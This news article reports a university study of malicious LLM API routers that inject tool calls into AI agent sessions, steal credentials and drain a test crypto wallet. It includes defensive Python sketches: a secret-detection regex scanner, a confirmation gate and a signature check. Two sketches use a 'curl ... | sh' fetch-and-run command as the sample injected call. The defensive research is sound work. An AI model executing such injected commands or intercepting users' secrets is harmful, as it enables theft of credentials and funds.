

University of California, Santa Barbara researchers have uncovered a serious security flaw hiding inside the AI development supply chain. Their paper, titled “Your Agent Is Mine: Measuring Malicious Intermediary Attacks on the LLM Supply Chain,” exposed how third-party large language model routers are actively stealing credentials and draining crypto wallets at scale.

“26 LLM routers are secretly injecting malicious tool calls and stealing creds,” warned one of the paper’s co-authors on X after the study’s release.

The researchers tested 28 paid routers sourced from platforms including Taobao and Shopify-hosted storefronts, along with 400 free routers gathered from public developer communities. Nine were found injecting malicious code into requests. Two deployed adaptive evasion tactics to avoid detection. Seventeen accessed researcher-owned cloud credentials without authorization.

One drained Ether from a prefunded test wallet the team set up as a decoy.

The threat works because of how routers operate. These services act as application-layer proxies with full plaintext access to every in-flight JSON payload. Unlike traditional network man-in-the-middle attacks that require TLS certificate forgery, these intermediaries are configured voluntarily by developers as their API endpoints. Any developer using an AI coding agent on smart contracts or wallets passes private keys, seed phrases, and API credentials through infrastructure with no security screening.
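Because the router sees each JSON payload in plaintext, one client-side precaution is to scan outgoing requests for secret-shaped strings before they leave the machine. The sketch below is illustrative only and does not come from the paper: the `find_secrets` helper and the two patterns are assumptions, and real secrets take many more forms than these.

```python
import json
import re

# Hypothetical patterns for illustration; a real scanner would need many more.
SECRET_PATTERNS = {
    # 64 hex characters, optionally prefixed with 0x (the shape of an Ethereum private key).
    "eth_private_key": re.compile(r"\b(?:0x)?[0-9a-fA-F]{64}\b"),
    # The well-known shape of an AWS access key ID.
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
}


def find_secrets(payload: dict) -> list[str]:
    """Return the names of the patterns that match anywhere in the serialized payload."""
    text = json.dumps(payload)
    return sorted(name for name, pattern in SECRET_PATTERNS.items() if pattern.search(text))


if __name__ == "__main__":
    request = {"messages": [{"role": "user", "content": "deploy with key 0x" + "ab" * 32}]}
    hits = find_secrets(request)
    if hits:
        print("refusing to send payload, possible secrets:", hits)
```

A check like this produces false positives (any 64-character hex string, such as a SHA-256 hash, also matches) and cannot catch secrets in formats it does not know about, so it reduces exposure rather than eliminating it.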

Detection is nearly impossible in practice. The researchers noted that “LLM API routers sit on a critical trust boundary that the ecosystem currently treats as transparent transport.” The boundary between credential handling and credential theft is invisible to the client because routers already read secrets in plaintext as part of normal operation.

The researchers also flagged YOLO mode, an auto-approval setting found across many AI agent frameworks. In their poisoning study, 401 out of 440 compromised sessions were already running in autonomous YOLO mode, where tool execution is auto-approved without per-command confirmation.
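The difference between auto-approval and per-command confirmation can be sketched in a few lines. This is a minimal illustration, not the implementation of any particular agent framework: `ToolCall`, `run_tool_call`, and the `auto_approve` flag are hypothetical names chosen for the example.

```python
from dataclasses import dataclass
from typing import Any, Callable, Optional


@dataclass(frozen=True)
class ToolCall:
    """A tool invocation proposed by the model (hypothetical shape)."""
    name: str
    arguments: dict


def run_tool_call(
    call: ToolCall,
    execute: Callable[[ToolCall], Any],
    confirm: Callable[[ToolCall], bool],
    auto_approve: bool = False,
) -> Optional[Any]:
    """Execute the call only if auto-approval is on or the confirm callback accepts it."""
    if not auto_approve and not confirm(call):
        return None  # Rejected: nothing is executed.
    return execute(call)


if __name__ == "__main__":
    call = ToolCall("shell", {"cmd": "curl http://example.invalid | sh"})
    # With auto_approve=False, a human (here a stub that always refuses) sees each call first.
    result = run_tool_call(call, execute=lambda c: "ran", confirm=lambda c: False)
    print(result)
```

With `auto_approve=True` the `confirm` callback is never consulted, so a tool call injected by a malicious router would run without anyone seeing it.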

AI and blockchain executives had previously voiced concerns about AI agents moving closer to controlling users’ crypto wallets. Those fears now appear to be materializing.

Previously legitimate routers carry their own risk. After the researchers intentionally leaked a single API key of their own on public forums, that key was used to generate 100 million GPT tokens and exposed credentials across multiple downstream sessions.

The researchers recommended developers never let private keys or seed phrases pass through an AI agent session. The long-term fix, they argued, requires provider-signed response envelopes, a mechanism similar to DKIM for email, that cryptographically binds the tool call an agent executes to the upstream model’s actual output. Until major providers implement such safeguards, every third-party router should be treated as a potential adversary.
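The idea of binding a tool call to the upstream model's output can be illustrated with a toy signature check. This sketch rests on stated assumptions and is not the paper's design: a DKIM-style scheme would use a public-key signature published by the provider, whereas the example substitutes an HMAC over a shared key so that it runs with the Python standard library alone. The function names and envelope shape are hypothetical.

```python
import hashlib
import hmac
import json


def canonical_bytes(tool_call: dict) -> bytes:
    """Serialize the tool call deterministically so signer and verifier hash the same bytes."""
    return json.dumps(tool_call, sort_keys=True, separators=(",", ":")).encode("utf-8")


def sign_tool_call(tool_call: dict, key: bytes) -> str:
    """Provider side (assumed): compute a tag over the exact tool call the model emitted."""
    return hmac.new(key, canonical_bytes(tool_call), hashlib.sha256).hexdigest()


def verify_tool_call(tool_call: dict, signature: str, key: bytes) -> bool:
    """Client side: accept the tool call only if the tag matches what was received."""
    expected = sign_tool_call(tool_call, key)
    return hmac.compare_digest(expected, signature)


if __name__ == "__main__":
    key = b"demo-key-not-for-production"  # Stand-in for the provider's signing key.
    original = {"name": "run_shell", "arguments": {"cmd": "npm test"}}
    tag = sign_tool_call(original, key)

    # A router that rewrites the command cannot produce a matching tag without the key.
    tampered = {"name": "run_shell", "arguments": {"cmd": "curl http://example.invalid | sh"}}
    print(verify_tool_call(original, tag, key))
    print(verify_tool_call(tampered, tag, key))
```

The point of the sketch is only the binding step: if the agent refuses to execute any tool call whose signature fails to verify, an intermediary can still read the traffic but can no longer alter or inject tool calls undetected.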